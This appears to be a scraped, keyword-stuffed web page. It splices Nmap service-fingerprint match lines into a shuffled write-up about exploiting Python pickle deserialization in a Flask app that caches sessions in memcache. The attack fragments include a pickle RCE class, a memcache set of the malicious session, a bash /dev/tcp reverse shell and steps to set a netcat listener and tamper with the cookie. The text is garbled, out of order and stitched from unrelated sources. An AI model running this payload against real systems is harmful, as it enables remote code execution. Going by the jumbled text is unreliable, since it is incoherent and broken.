![netcat reverse shell listener mc netcat reverse shell listener mc](https://1.bp.blogspot.com/-HiipCCUiV00/Xw4RyNgXwYI/AAAAAAAAl1Y/WNLhyHqZegcM0Hj2jVZ6GFB0SIlG8r0VACLcBGAsYHQ/s1600/1.png)
200 OK\r\nServer: Motion/(+)\r\n| p/Motion Camera httpd/ v/$1/ d/webcam/ Match http m|^HTTP/1\.1 200 OK\nMax-Age: 0\nExpires: 0\nCache-Control: no-cache\nCache-Control: private\nPragma: no-cache\nContent-type: multipart/x-mixed-replace boundary=BoundaryString\n\n-BoundaryString\n| p/Motion Webcam gateway httpd/ *\r\n\r\n 500 Internal Server Error\r\n\r\n\r\n| p/Cisco Catalyst http config/ d/switch/ o/IOS/ cpe:/o:cisco:ios/a Match http m|^HTTP/1\.0 500 Internal Server Error\r\nDate. *\r\nServer: SonicWALL\r\n| p/SonicWALL firewall http config/ d/firewall/ Match http m|^HTTP/1\.0 301 Moved\r\nLocation: p/SMC Barricade broadband router/ i/simply redirects to real web admin port 88/ d/broadband router/
![netcat reverse shell listener mc netcat reverse shell listener mc](https://blog.ropnop.com/images/2017/07/tmux_over_netcat-1.png)
Reverse shell connection after flask app deserialized the data.Match http m|^HTTP/1.0 500\r\nContent-type: text/plain\r\n\r\nNo Scan Capable Devices Found\r\n| p/HP Embedded Web Server remote scan service/ i/no scanner found/ d/printer/ Modify the cookie value which corresponds to the memcache key. To deserialize the data in memcache server, use the web developer tool and select /admin then right click and select “edit and resend”, change the cookie to “you_have_been_pwned” then send, before doing this cookie modification setup the netcat listener first.
NETCAT REVERSE SHELL LISTENER MC CODE
The above code is to send a serialized data which contains a reverse shell command line to the memcache daemon. Mc.set("session:you_have_been_pwned", pickle.dumps(RCE())) # Set a key you_have_been_pwned with serialized data of the reverse shell command. # _reduce_ returns a tuple of callable and tuple of arguments of the callable MC_ERR = (MemcacheError, MemcacheClientError, MemcacheServerError, MemcacheUnknownError)Ĭmd = f"/bin/bash -c '/bin/bash -i >& /dev/tcp/ 0>&1'" Disclaimer from pickle’s documentation.įrom pickle’s disclaimer it is developer’s responsibility to ensure serialized data is from “trusted” source… but how can developer ensure? Supposed if there is a flask app and serialized data may be coming from clients…įrom import Client The content is a deserialized data in string format. session cookies can be referenced with memcache server The deserialized content of the session.įrom the result of memccat there are p1, p2 and p3 in the content, this reveals that pickle is used for deserialization and serialization. The page after logon.Įach session is cached in the memcache daemon, and the session after logon can be retrieved with firefox’s web developer’s tool. The flask app takes in a login and does nothing else. The difference between json and pickle can be found here: Login form of flask app Json serialized data is human-readable while pickle serialized data is not. Deserialization is to convert the byte stream back to python’s object. Serialization is a process of converting the python’s object into byte stream for transport over the network or convert the python object into byte stream for storing into a file. The flask app caches the logon session in the memcache daemon, in python pickle is used to serialize and deserialize data.